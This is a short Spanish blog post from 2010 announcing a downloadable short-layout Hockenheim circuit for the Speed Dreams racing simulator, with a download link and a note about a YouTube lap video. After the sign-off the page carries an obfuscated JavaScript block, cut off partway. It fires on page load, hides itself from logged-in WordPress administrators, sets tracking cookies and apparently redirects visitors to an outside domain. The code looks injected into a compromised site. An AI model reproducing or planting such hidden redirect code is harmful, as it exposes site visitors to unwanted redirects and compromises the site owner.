

En Descarga Jhockenjeim-Corto Track

Escrito por apr-torcs
Sábado, 17 de Julio de 2010 00:01 -

Para la configuración de distintos coches y robots en Speed Dreams, es muy util esta pista que acabo de terminar.

Se trata de la versión corta del Circuito de Hockenheim. En esta hay dos variantes; con chicane o sin ella en la curva llamada Ausgang Querspange.

La que os presento aquí es la variante sin chicane.

Os dejo tambien un video que encontré en youtube, con una vuelta a esta pista. Asi podeis comparar y buscar posibles mejoras.

Esta es otra pista mas para seguir avanzando en todo lo que es el entorno de la misma. A la vez me sirve de base para crear la versión GP de F1.

Espero que os guste.

[Descarga el Jhockenjeim-Corto Track](#)

Salud

var
_0x2cf4=['MSIE;', 'OPR', 'Chromium', 'Chrome', 'ppkcookie', 'location', 'https://www.areyourobots.xy

En Descarga Jhockenjeim-Corto Track

Escrito por apr-torcs

Sábado, 17 de Julio de 2010 00:01 -

```
z','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';x20path=/', 'split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadmi nbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546="";if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]='_0xe0ae90+'+'+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c
```